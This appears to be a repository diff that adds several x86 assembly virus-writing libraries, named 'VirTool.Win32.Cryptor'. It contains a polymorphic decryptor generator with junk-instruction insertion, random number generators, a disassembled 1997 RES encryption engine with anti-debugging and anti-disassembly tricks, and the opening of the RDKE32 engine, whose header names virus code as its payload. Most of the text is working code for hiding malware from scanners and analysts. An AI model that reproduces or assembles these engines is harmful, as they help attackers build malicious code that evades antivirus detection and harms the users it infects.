push ebp edi esi ebx ; Ñîõðàíÿåì ðåãèñòðû
mov [ebp+sz_code],ecx ; Çàíîñèì ïàðàìåòðû ñòàðòà
mov [ebp+begin_code],eax ; èç ðåãèñòðîâ â ïåðåìåííûå
mov [ebp+buff],edx ;
mov edi,edx ;
;------------------------------------------------------------------------------;
call len_gen ; Âûçûâàåì ãåíåðàòîð äëèí
mov [ebp+sz_decr],40
add [ebp+sz_decr],ecx ; äîáàâëÿåì äëèíû ìóñîðà ê
; ðàçìåðó äåêðèïòîðà
call reg_mutate ; Âûáèðàåì ðåãèñòðû, êîòîðûå
; áóäóò èñïîëüçîâàòüñÿ â
; äåêðèïòîðå
mov ecx,[ebp+len+0] ; È ãåíåðèðóåì ïåðâóþ ïàðòèþ
call garbage ; ìóñîðíûõ èíñòðóêöèé
mov al,0e8h ; Ãåíåðèðóåì ñëåäóþùóþ
stosb ; èíñòðóêöèþ: call $+5
xor eax,eax ;
stosd ;
mov ecx,[ebp+len+4] ; Ãåíåðèðóåì íîâóþ ïàðòèþ
call garbage ; ìóñîðíûõ èíñòðóêöèé
mov al,58h ; Ãåíåðèðóåì ñëåäóþùóþ
add al,bh ; èíñòðóêöèþ äåêðèïòîðà:
stosb ; pop reg1
mov ecx,[ebp+len+8] ; Ãåíåðèðóåì ìóñîðíûå
call garbage ; èíñòðóêöèè
; Ãåíåðèðóåì ñëåäóþùóþ
mov al,81h ; èíñòðóêöèþ äåêðèïòîðà:
stosb ; add reg1,sz_decr-len[0]
mov al,0c0h ;
add al,bh ; Òàêèì îáðàçîì reg1 áóäåò
stosb ; óêàçûâàòü íà íà÷àëî
; çàêðèïòîâàííîãî êîäà
mov eax,[ebp+sz_decr] ;
sub eax,[ebp+len] ;
sub eax,9 ;
stosd ;
mov ecx,[ebp+len+12] ; Ãåíåðèðóåì ìóñîðíûå
call garbage ; èíñòðóêöèè
mov al,8bh ; Ãåíåðèðóåì èíñòðóêöèþ:
stosb ; mov reg2,reg1
;
mov al,bl ; Ó íàñ reg2 ïîçæå áóäåò
shl al,3 ; èñïîëüçîâàòüñÿ äëÿ
add al,0c0h ; ñðàâíåíèÿ
add al,bh ;
stosb
mov ecx,[ebp+len+16] ; Ãåíåðèðóåì ìóñîðíûå
call garbage ; èíñòðóêöèè
mov al,81h ;
stosb ;
mov al,0c0h ;
add al,bl ;
stosb ;
; Ãåíåðèðóåì èíñòðóêöèþ:
mov eax,[ebp+sz_code] ; add reg2,size_code
inc eax
stosd ;
mov ecx,[ebp+len+20] ; Ãåíåðèðóåì ìóñîðíûå
call garbage ; èíñòðóêöèè
mov al,81h ;
stosb ; Ãåíåðèðóåì ñëåäóþùóþ
mov al,0c0h ; èíñòðóêöèþ: add reg1,4
add al,bh ;
stosb ;
;
mov eax,4 ;
stosd ;
mov ecx,[ebp+len+24] ; Ãåíåðèðóåì ñëåäóþùóþ
call garbage ; ïàðòèþ ìóñîðà
call random32 ;
mov [ebp+key2],eax ; Ñîõðàíÿåì êëþ÷ êðèïòîâàíèÿ
lea eax,[ebp+next] ; Êëàä¸ì â ñòýê ñìåùåíèå
push eax ; íà ìåòêó next
; Âûáèðàåì îäèí èç òð¸õ
; âàðèàíòîâ êðèïòîâàíèÿ
mov eax,3 ; ñëó÷àéíûì îáðàçîì.
call brandom32 ;
; Àëãîðèòìû êðèïòîâàíèÿ è
cmp al,1 ; äåêðèïòîâàíèÿ:
je enc_add32 ;
; 1) XOR
cmp al,2 ; 2) ADD
je enc_sub32 ; 3) SUB
enc_xor32:
mov al,81h ;
stosb ; Ãåíåðèðóåì èíñòðóêöèþ:
mov al,30h ; xor [reg1],key_decrypt
add al,bh ;
stosb ;
mov eax,[ebp+key2]
stosd
push edi ;
lea edi,[ebp+crypt_n] ;
mov al,33h ; À â ñàìîì äâèæêå ìåíÿåòñÿ
stosb ; àëãîðèòì êðèïòîâàíèÿ
pop edi ;
ret ; Ïåðåõîä íà ìåòêó next
enc_add32:
mov al,81h ;
stosb ; Ãåíåðèðóåì èíñòðóêöèþ:
mov al,bh ; add [reg1],key_decrypt
stosb ;
mov eax,[ebp+key2]
stosd
push edi ;
lea edi,[ebp+crypt_n] ;
mov al,2bh ; À â ñàìîì äâèæêå ìåíÿåòñÿ
stosb ; àëãîðèòì êðèïòîâàíèÿ
pop edi ;
ret ; Ïåðåõîä íà ìåòêó next
enc_sub32:
mov al,81h ;
stosb ; Ãåíåðèðóåì ñëåäóþùóþ
mov al,028h ; èíñòðóêöèþ:
add al,bh ; sub [reg1],key_decrypt
stosb ;
mov eax,[ebp+key2]
stosd
push edi ;
lea edi,[ebp+crypt_n] ; À â ñàìîì äâèæêå ìåíÿåì
mov al,03h ; àëãîðèòì êðèïòîâàíèÿ
stosb ;
pop edi ;
ret ; Ïåðåõîä íà ìåòêó next
;------------------------------------------------------------------------------;
next:
mov ecx,[ebp+len+28] ; Ãåíåðèðóåì î÷åðåäíóþ
call garbage ; ïàðòèþ ìóñîðà
mov al,3bh ;
stosb ;
;
xor eax,eax ;
mov al,bh ; Ãåíåðèðóåì èíñòðóêöèþ:
shl al,3 ; cmp reg1,reg2
add al,0c0h ;
add al,bl ;
stosb ;
;------------------------------------------------------------------------------;
mov ax,820fh ;
stosw ;
xor eax,eax ;
dec eax ; Ãåíåðèðóåì èíñòðóêöèþ:
mov ecx,7*4 ; jb decrypt
sub eax,[ebp+len+ecx] ;
mov ecx,6*4 ;
sub eax,[ebp+len+ecx] ;
sub eax,19 ;
stosd ;
mov ecx,[ebp+len+32] ; Ãåíåðèðóåì ìóñîðíûå
call garbage ; èíñòðóêöèè
;------------------------------------------------------------------------------;
mov ecx,[ebp+sz_code] ;
mov esi,[ebp+begin_code] ;
add ecx,esi ;
encrypt: ;
lodsd ; Êðèïòóåì âåñü êîä êëþ÷îì
crypt_n: ; è íóæíûì àëãîðèòìîì
xor eax,[ebp+key2] ;
stosd ;
cmp esi,ecx ;
jl encrypt ;
mov edx,[ebp+buff] ; Çàïîëíÿåì ðåãèñòðû
mov ecx,[ebp+sz_code] ; ðåçóëüòàòàìè
add ecx,[ebp+sz_decr] ;
pop ebx esi edi ebp ; Âîñòàíàâëèâàåì ðåãèñòðû
ret ; È âûõîäèì èç ïðîöåäóðû
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; GARBAGE LENGTH GENERATOR SUBROUTINE ;
;------------------------------------------------------------------------------;
; [ IN ] ;
; ;
; NO INPUT IN SUBROTINE ;
;------------------------------------------------------------------------------;
; [ OUT ] ;
; ;
; LENGTH OF ALL GARBAGE -> ECX ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
len_gen: ; Ïîäïðîãðàììà ãåíåðàöèè
; äëèí äëÿ ìóñîðíûõ
; èíñòðóêöèé
xor ecx,ecx ; Îáíóëÿåì esi è ecx
xor esi,esi ;
loop1: ;
mov eax,100 ;
call brandom32 ; Íà÷èíàåì ãåíåðàöèþ
; äëèí, êàæäîå ÷èñëî
mov [ebp+len+esi],eax ; äèàïàçîíå 0..100
add ecx,eax ;
add esi,4 ;
cmp esi,36 ;
jne loop1 ;
ret ; Âîçâðàò èç ïîäïðîãðàììû
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; REGISTER MUTATOR SUBROUTINE ;
;------------------------------------------------------------------------------;
; [ IN ] ;
; ;
; NO INPUT IN SUBROTINE ;
;------------------------------------------------------------------------------;
; [ OUT ] ;
; ;
; USES REGISTER N1 -> BH (0..7) ;
; USES REGISTER N2 -> BL (0..7) ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
reg_mutate:
; Ïîäïðîãðàììà ãåíåðàöèè
generate1: ; ðåãèñòðîâ äëÿ äåêðèïòîðà
mov eax,8 ; Ïîëó÷àåì ñëó÷àéíîå ÷èñëî
call brandom32 ; â äèàïàçîíå 0..7
cmp al,00000100b ; Èñïîëüçóåì âñå ðåãèñòðû
je generate1 ; êðîìå esp
cmp al,00000101b ; Èñïîëüçóåì âñå ðåãèñòðû
je generate1 ; êðîìå ebp
mov bh,al ; Ñîõðàíÿåì ïîëó÷åííûé
; ðåãèñòð
generate2:
mov eax,8 ; Ïîëó÷àåì ñëó÷àéíîå ÷èñëî
call brandom32 ; â äèàïàçîíå 0..7
cmp al,bh ; Íå äîëæíî áûòü äâóõ
je generate2 ; èäåíòè÷íûõ ðåãèñòðîâ
cmp al,00000100b ; Èñïîëüçóåì âñå ðåãèñòðû
je generate2 ; êðîìå esp
mov bl,al ; Ñîõðàíÿåì ïîëó÷åííûé
; ðåãèñòð
ret ; Âîçâðàò èç ïîäïðîãðàììû
;------------------------------------------------------------------------------;
sz_decr dd 0 ;
begin_code dd 0 ; Äàííûå íåîáõîäèìûå äëÿ
st_code dd 0 ; êîððåêòíîé ðàáîòû
sz_code dd 0 ; ãåíåðàòîðà
buff dd 0 ;
key2 dd 0 ;
;------------------------------------------------------------------------------;
len dd 0,0,0,0,0,0,0,0,0 ; Ìåñòî äëÿ õðàíåíèÿ äëèí
;------------------------------------------------------------------------------;

222
libs/VirTool.Win32.Cryptor.Pkrng.inc Normal file
View File

@ -0,0 +1,222 @@
;
; pker's Random Number Generator (PKRNG)
; ======================================
;
;
; Description
; -----------
;
; PKRNG is a random number generator. It can be used for MASM, TASM, FASM, etc. It
; containz four procedurez: __randomize, __random and __m_seq_gen and
; __random_rdtsc. __randomize procedure is for generating initial seed in the seed
; field, which specified as parameter. The __m_seq_gen procedure is used to
; generate m-sequence, which used by __random, which generate random numberz
; finally. __random_rdtsc is the simplest one, it just get the RDTSC and divide it
; by the range given as parameter.
;
;
; How to use PKRNG
; ----------------
;
; When using MASM or TASM to initialize seed field:
;
; mov edi,offset dwSeed
; call __randomize
;
; The get a random number in eax:
;
; mov eax,offset dwSeed
; mov ecx,32 ; get a random number between 0~31
; call __random
;
;
; Same thing happened with FASM:
;
; mov edi,dwSeed
; call __randomize
;
; mov eax,dwSeed
; mov ecx,32 ; get a random number between 0~31
; call __random
;
;
; Copyright
; ---------
;
; (c) 2004. No rightz reserved. Use without permission :P.
;
;
; __randomize procedure
; =====================
;
;
; Description
; -----------
;
; This function use RDTSC instruction to generator a random number in order to
; initialize the seed field.
;
;
; Parameterz and Return Values
; ----------------------------
;
; input:
; edi --- points to the seed field
; output:
; nothing
;
__randomize: pushad
db 0fh,31h ; RDTSC
add eax,edx ; ...
stosd ; fill in the seed buffer
popad
ret
;
; __random procedure
; ==================
;
;
; Description
; -----------
;
; This function generates a random number and rewrite the seed field. The function
; first get a 32 bit m-sequence, which then multiply with the previous seed, with
; __m_seq_gen procedure. And then, it calls __m_seq_gen again to generate another
; m-sequence to make noise by adding on the DWORD calculated before. Also, this
; result is the new seed, and will be write to the seed field which pointed by EAX
; as argument. Finally, the seed is divided by ECX, and return the modulus, which
; is the expected random number.
;
;
; Parameterz and Return Values
; ----------------------------
;
; input:
; eax --- pointz to the random seed field
; edx --- the range of the random number to be generated
; output:
; eax --- random number as result
;
__random: pushad
xchg ecx,edx
mov edi,eax
mov esi,eax
lodsd ; get the previous seed value
mov ebx,eax
mov ebp,ebx
call __m_seq_gen ; generate a m-sequence
imul ebp ; multiply with the previous seed
xchg ebx,eax
call __m_seq_gen ; generate anothe m-sequence
add eax,ebx ; to make noise...
add eax,92151fech ; and some noisez...
stosd ; write new seed value
xor edx,edx
div ecx ; calculate the random number
mov [esp+28],edx ; according to a specified range
popad
ret
;
; __m_seq_gen procedure
; =====================
;
;
; Description
; -----------
;
; This function use a PN (Pseudo Noise) generator to generate m-sequencez. The
; configuration of the generator shows below (figure 1):
;
; (module 2 addition)
; ___
; / \
; +---------- | + | <------------------------------+
; | \___/ |
; | A |
; | +-----+ | +-----+ +-----+ |
; +--> | D31 | -+-> | D30 | ---> ... ---> | D01 | -+-> output
; +-----+ +-----+ +-----+
; A A A
; | | |
; CLK ---------------+------------+---------------------+
;
; figure 1. m-Sequence Generator
;
;
; Parameterz and Return Values
; ----------------------------
;
; input:
; eax --- a non-zero random number, which could be generated by RDTSC or
; GetTickCount or such functionz
; output:
; eax --- the result of the function
;
__m_seq_gen: pushad
xor esi,esi ; use to save the 32bit m-sequence
push 32 ; loop 32 times (but it's not a
pop ecx ; cycle in the m-sequence generator)
msg_next_bit: mov ebx,eax
mov ebp,ebx
xor edx,edx
inc edx
and ebp,edx ; get the lowest bit
dec cl
shl ebp,cl
or esi,ebp ; output...
inc cl
and ebx,80000001h ; \
ror bx,1 ; \
mov edx,ebx ; \
ror ebx,16 ; module 2 addition
xor bx,dx ; /
rcl ebx,17 ; /
rcr eax,1 ; /
loop msg_next_bit
mov [esp+28],esi
popad
ret
;
; __random_rdtsc procedure
; ========================
;
;
; Description
; -----------
;
; This is the simplest RNG in the packet. Well, nothing to explain :P
;
;
; Parameterz and Return Value
; ---------------------------
;
; input:
; ecx --- the range of the random number to be generated
;
; output:
; eax --- random number as result
;
__random_rdtsc: pushad
db 0fh,31h
add eax,edx
xor edx,edx
or ecx,ecx
jz rnd_rdt_no_range
div ecx
xchg eax,edx
rnd_rdt_no_range:
mov [esp+28],eax
popad
ret

1807
libs/VirTool.Win32.Cryptor.PolyCrypto.inc Normal file
View File

File diff suppressed because it is too large Load Diff

458
libs/VirTool.Win32.Cryptor.RES.ASM Normal file
View File

@ -0,0 +1,458 @@
; - -[RES.ASM]- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
;
; Random Encryption Synthezator (RES), by SSR
; Disasm by Tcp/29A (tcp@cryogen.com)
;
;
; Entry:
; DS:DX = code
; BX = runtime offset
; CX = number of bytes to encrypt
; Return:
; DS:DX = encryptor+code
; CX = size encryptor+code
.386p
RES segment use16
assume cs:RES, ds:RES, es:RES, ss:RES
org 0
RES_SIZE_DEC equ 300h ; But it only needs 169h
res_engine:
start:
call res_delta
res_delta:
pop si
sub si,3 ; Get delta-offset
pop ax
push cs
push ax
push es
mov ax,es
sub ax,10h
mov es,ax
mov di,100h
push cx
mov cx,offset(end_res)
nop
push ds
push cs
pop ds
cld
rep movsb ; Copy RES code to working area
pop ds
pop cx
mov ax,offset(res_start+100h)
push es
push ax
retf ; jmp res_start
res_start:
pop es
mov si,100h
mov ax,es
add ax,(end_res-start+15)/16+1
mov es,ax ; Calculate base segment for decryptor
mov cs:[si+runtime_ofs],bx
mov cs:[si+code_length],cx
push cx
mov cx,RES_SIZE_DEC
xor di,di
mov al,90h ; NOP
cld
rep stosb ; Fill with NOPs
call init_masks
mov cx,8 ; 8 instructions per decryptor
xor di,di
add di,si
l_select_instructions:
push cx
call RES_get_random
mov ah,0
push cx
mov cl,5
shr al,cl ; AX in [0..7]
shl ax,1
shl ax,1 ; AX:=AX*4 (4 bytes per instruction)
pop cx
push di
push si
add di,offset(buffer_decryptor)
add si,offset(decryptor_table)
add si,ax
push ax
mov ax,cs:[si] ; Select an instruction for decryptor
mov cs:[di],ax ; and store it
mov ax,cs:[si+2]
mov cs:[di+2],ax
pop ax
pop si
pop di
push di
push si
add di,offset(buffer_encryptor)
add si,offset(encryptor_table)
add si,ax
push ax
mov ax,cs:[si] ; Select the instruction for encryptor
mov cs:[di],ax ; and store it
mov ax,cs:[si+2]
mov cs:[di+2],ax
pop ax
pop si
pop di
add di,4
pop cx
loop l_select_instructions
call reverse_decryptor_table
call make_encryptor
pop cx
push cx
mov bp,dx
mov di,RES_SIZE_DEC
mov cs:[si+code_CRC],0
l_encrypt_code:
mov al,ds:[bp]
mov es:[di],al
mov ah,0
add cs:[si+code_CRC],ax ; Make code CRC
encryptor db 8*4 dup(90h) ; Buffer for encryptor
inc di
inc bp
loop l_encrypt_code
push ds
push cs
pop ds
xor di,di
push si
add si,offset(decryptor_code)
mov cx,decrypted_code-decryptor_code
nop
cld
rep movsb ; Copy decryptor to buffer
pop si
pop ds
push es
pop ds
xor dx,dx ; DS:DX = Address of decryptor+code
pop cx
add cx,RES_SIZE_DEC ; Decryptor+encrypted code
retf
db 0
db 'RandomEncryptionSynthezator',0
db 'ü S.S.R. 1996-97',0
init_masks:
push si
mov cx,3 ; Only first 3 instructions need a mask
l_next_mask:
call RES_get_random
mov byte ptr cs:[si+decryptor_table+3],al ; Store mask
mov byte ptr cs:[si+encryptor_table+3],al
add si,4 ; Next inst.
loop l_next_mask
pop si
ret
RES_get_random:
pushf
in al,40h ; Get random number
ror al,1
xor al,53h
popf
ret
make_encryptor:
push es
push ds
push cs
pop es
push cs
pop ds
push si
in al,40h ; Get random number
mov cx,8
mov di,offset(encryptor)
add di,si
add si,offset(buffer_encryptor)
l_make_encryptor:
rcr al,1 ; Add instruction to encryptor?
jc add_instruction ; Yes? then jmp
nop
nop
add si,4
loop_make_encryptor:
loop l_make_encryptor
jmp encryptor_done
nop
add_instruction:
cld
push cx
mov cx,4
rep movsb ; Store instruction
pop cx
jmp loop_make_encryptor
encryptor_done:
pop si
pop ds
pop es
ret
reverse_decryptor_table:
push ax
push bp
push di
push cx
push bx
mov cx,8/2
mov di,offset(buffer_decryptor)
add di,si
mov bp,offset(end_buffer_dec)-4 ; Point to last inst.
add bp,si
l_reverse_table:
mov ax,cs:[di] ; Xchg instructions
mov bx,cs:[bp]
mov cs:[di],bx
mov cs:[bp],ax
mov ax,cs:[di+2]
mov bx,cs:[bp+2]
mov cs:[di+2],bx
mov cs:[bp+2],ax
sub bp,4 ; xchg next instruction
add di,4
loop l_reverse_table
pop bx
pop cx
pop di
pop bp
pop ax
ret
db 4 ; Unused !!
decryptor_code:
runtime_ofs equ word ptr $+1
mov bp,0 ; mov bp,runtime_ofs
push 1100h+(90h+3Ch-20h)
sub bp,offset(decryptor_code)
mov di,offset(decryptor)
add di,bp
pop ax ; AX:=1100h+(90h+3Ch-20h)
inc cs:[bp+n_decryptors] ; Inc # of tested decryptors
mov cs:[bp+decryptor_ok],0 ; Decryptor not found
mov cs:[bp+decrypting],0 ; Not decrypting
mov cx,20h
push es
push ds
add ax,cx
push cs
pop es
push cs
pop ds
cld
dec cx
sub al,3Ch ; AL:=90h (NOP)
rep stosb
add al,3Ch ; AL:=0CCh (int 3)
stosb
cmp cs:[bp+n_decryptors],150 ; < 150 decryptors tested?
jb create_random_decryptor ; Yes? then jmp
nop
nop
mov ax,cs:[bp+n_decryptors] ; Don't use a random number.
; n_decryptors will be increased, so it'll
; find the correct decryptor.
jmp create_decryptor
nop
db 66h ; Unused!? (antidebug??)
create_random_decryptor:
in al,40h ; Get random number
create_decryptor:
mov cs:[bp+decryptor_id],al ; Why? Never use it!!
mov cx,8
mov si,offset(buffer_decryptor)
add si,bp
mov di,offset(decryptor)
add di,bp
l_make_random_decryptor:
rcr al,1 ; Add instruction to decryptor?
jc add_inst_dec ; Yes? then jmp
nop
nop
add si,4
next_dec_instruction:
loop l_make_random_decryptor
jmp done_random_decryptor
nop
add_inst_dec:
cld
push cx
mov cx,4
rep movsb ; Add instruction
pop cx
jmp next_dec_instruction
done_random_decryptor:
mov di,RES_SIZE_DEC
add di,cs:[bp+runtime_ofs]
code_length equ word ptr $+1
mov cx,0 ; mov cx,code_length
mov bx,cs:[bp+code_CRC]
l_random_decryptor:
mov dl,cs:[di]
decryptor db 8*4 dup(90h)
mov al,dl
mov ah,0
sub bx,ax ; Calculate CRC
cmp cs:[bp+decrypting],1 ; Decrypting?
je decrypt_byte ; Yes? then jmp
nop
nop
loop_decryptor:
inc di
loop l_random_decryptor
pop ds
pop es
cmp bx,0 ; CRC OK?
jnz decryptor_code ; No? then jmp
jmp found_decryptor ; Yes? then jmp
nop
buffer_decryptor db 8*4 dup(90h)
end_buffer_dec:
code_CRC dw 0
decryptor_ok db 0
decrypting db 0
db 0Bh ; Unused!
db 0Bh ; Unused!
db 0Bh ; Unused!
decryptor_id db 0
n_decryptors dw 0
decrypt_byte:
mov cs:[di],dl ; Store decrypted byte
jmp loop_decryptor
found_decryptor:
cmp cs:[bp+decryptor_ok],1 ; Code decrypted?
je code_decrypted ; Yes? then jmp
nop
nop
mov cs:[bp+decrypting],1
mov cs:[bp+decryptor_ok],1
push es
push ds
jmp done_random_decryptor ; Decrypt code
code_decrypted:
jmp anti_disasm1
nop
db 69h ; Antidebug
anti_disasm1:
cli
push 3545h
jmp anti_disasm2
nop
db 0EAh ; Antidebug
anti_disasm2:
cli
inc sp
mov ax,cs:[bp]
xor ax,bx
cld
scasb
inc sp
mov ax,4202h
sub sp,2
pop ax
cmp ax,3545h ; Is it being traced?
jne decrypted_code ; Yes? then jmp
; BUG! Should jump when not traced
nop
nop
xor ax,3445h
mov es,ax
inc byte ptr cs:[0Dh]
and cx,0Fh
rep scasb
xor ax,cs:[si]
pushf
pop ax ; Get flags
and ah,0FEh ; Clear trace flag
push ax
xchg bx,cx
les bx,ds:[2Bh]
popf ; Trace flag off
xor eax,eax
mov dr7,eax ; Clear all breakpoints
dec byte ptr cs:[0Dh]
call skip_reset
db 0EAh ; jmp far ptr 0F000h:0FFF0h (reset)
dw 0FFF0h ; but never reach here because in 'skip_reset'
dw 0F000h ; it does a pop of the return address
skip_reset:
pop ax
decrypted_code: ; End of decryptor code
encryptor_table:
xor byte ptr es:[di],0
add byte ptr es:[di],0
sub byte ptr es:[di],0
nop
ror byte ptr es:[di],1
nop
rol byte ptr es:[di],1
nop
neg byte ptr es:[di]
nop
not byte ptr es:[di]
nop
neg byte ptr es:[di]
decryptor_table:
nop
xor dl,0
nop
sub dl,0
nop
add dl,0
nop
nop
rol dl,1
nop
nop
ror dl,1
nop
nop
neg dl
nop
nop
not dl
nop
nop
neg dl
buffer_encryptor db 8*4 dup(90h)
end_res:
RES ends
public res_engine
end
; End of RES disasm
; (c) 1997, Tcp/29A (tcp@cryogen.com)

88
libs/VirTool.Win32.Cryptor.Random.asm Normal file
View File

@ -0,0 +1,88 @@
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ;
; xxxxxxxxxxx xxxxxxxx xxxx xxxx xxxxxxxxxx xxxxxxxx xxxxxxxxx ;
; xxxxxxxxxxxx xxxx xxxx xxxx xxxx xxxxxxxxxxx xxxxxxxxxx xxxxxxxxxxx ;
; xxxx xxxx xxxx xxxx xxxxx xxxx xxxx xxxx xxx xxxx xxx xxxx ;
; xxxx xxxx xxxx xxxx xxxxxx xxxx xxxx xxxx xxxx ;
; xxxx xxxx xxxx xxxx xxxxxxx xxxx xxxx xxxxxxxx xxxxxxxxxx ;
; xxxxxxxxxxx xxxx xx xxxx xxxx xxxxxxx xxxx xxxxxxxx xxxxxxxxxx ;
; xxxxxxxxxxxx xxxx xx xxxx xxxx xxxxxx xxxx xxxxx xxxx xxxx ;
; xxxx xxxx xxxx xxxx xxxx xxxxx xxxx xxxx xxxx xxxx xxx ;
; xxxx xxxx xxxx xxxx xxxx xxxx xxxxxxxxxxx xxxxxxxxxx xxxxxxxxxxx ;
; xxxx xxxx xxxx xxxx xxxx xxxx xxxxxxxxxx xxxxxxxxx xxxxxxxxxxx ;
; ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; RAndom Numbers Generator ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; :)! ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; функция RANG32 ;
; ГЕНЕРАТОР СЛУЧАЙНЫХ ЧИСЕЛ (ГСЧ) ;
; ;
; ;
;ВХОД: ;
;1 параметр - число (N). Будет произведен поиск случайного числа в диапазоне [0..N-1] ;
;--------------------------------------------------------------------------------------------------------;
;ВЫХОД: ;
;EAX - слуяайное число в диапазоне [0..N-1] ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; y0p! ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ФИЧИ ;
; ;
;(+) базонезависимость ;
;(+) прост в использовании ;
;(+) не использует WinApi'шек ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
; ;
; ИСПОЛЬЗОВАНИЕ: ;
; ;
;1) Подключение: ;
; rang32.asm ;
;2) Вызов (пример stdcall): ;
; push 5 ;кладем в стэк число ;
; call RANG32 ;вызываем ГСЧ -> в EAX после вызова будет значение [0..5-1] ;
; ;
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
;m1x
;pr0mix@mail.ru
;EOF
RANG32:
pushad ;сохраняем регистры
mov ecx,dword ptr [esp+24h] ;ecx=число, что передали в стэке
db 0fh,31h
imul eax,eax,1664525 ;идут разные вычисления для получения
add eax,1013904223 ;более случайного числа
add eax,edx
adc eax,esp
rcr eax,16
imul eax,[esp+32]
xor edx,edx
mul ecx ;mul действует как div
mov dword ptr [esp+1ch],edx
popad
ret 04
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
;конец функции RANG32
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

240
libs/VirTool.Win32.Cryptor.Rdk.inc Normal file
View File

@ -0,0 +1,240 @@
comment *
ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
ßßßÛÛÛÛÛÛ ÜÜ ßßß ßßß ÜÜÜ ÛÛÛÛÛÛßßß
±ÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛÛÛ ÛÛÛÛ°
ÛÛÛÛ ÛÛÛÛÛÛ ²ÛÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ± ÜÛÛÛÛ² ÛÛÛÛ
°ÛÛÛÛ ÛÛÛÛÛßÛÛÛÛß ÛÛÛÛ
±ÛÛÛÛ ÛÛÛÛ² ÛÛÜÜ ÛÛÛÛ°
ÜÜÜÜÜÜÜÜÜÜÜÜÜ ²ÛÛÛÛ ÛÛÛÛ± ÛÛÛÛ²Ü ÛÛÛÛ± ÜÜÜÜÜÜÜÜÜÜÜÜ
Û ÛÛÛÛÛ ÛÛÛÛ² ²ÛÛÛÛÛ° ÛÛÛÛ² Û
Û ÛÛÛÛÛ ÜÛÛÛÛÛ ²ÛÛÛÛ² ÛÛÛÛÛ Û
ßÜ ßßßßß ßßßß ßßßß ßßßßß Üß
ÜßßßßßßßßßßßßßßßßþThe Knight TemplarsþßßßßßßßßßßßßßßßÜ
Û Û
Û Random Decoding Key Engine 32-bit v 1.0 [RDKE32] Û
Û Code by Û
Û Darkman/TKT Û
Û Û
ßÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜß
Do not use this engine to encrypt known plaintext such as the actual virus
code. It is possible to decrypt known plaintext encrypted with this
engine using the X-RAY technique, also known as cryptanalysis. You can read
more about this technique in "Detecting oh, roughly every polymorphic engine
out there", an article by Rhincewind/VLAD, published in VLAD Magazine issue
4. Billy Belcebu/iKx did this mistake in Win32.Legacy using his Internal
ENCryptor v 1.0 [iENC], a Random Decoding Key (RDK) engine using a 8-bit
eXclusive OR (XOR) algorithm to encrypt the actual virus in 19 different
blocks.
Length of Random Decoding Key Engine 32-bit v 1.0 [RDKE32]: 171 bytes.
*
hash_size equ (0a0h/08h)
_RDKE32Encrypt struc
_lpHash dd ?
_lpBuffer dd ?
_dwNumberOfBytesToHashAndEncrypt dd ?
_dwSecurityLevel dd ?
ends
_RDKE32Decrypt struc
_lpHash dd ?
_lpBuffer dd ?
_dwNumberOfBytesToDecrypt dd ?
ends
_pushad struc
_edi dd ?
_esi dd ?
_ebp dd ?
_esp dd ?
_ebx dd ?
_edx dd ?
_ecx dd ?
_eax dd ?
ends
rdke32_begin:
; RDKE32Encrypt
;
;
; The RDKE32Encrypt function creates a hash and encrypts data.
;
; VOID RDKE32Encrypt(
; LPVOID lpHash // data buffer to receive hash
; LPVOID lpBuffer // data buffer of data to hash and encrypt
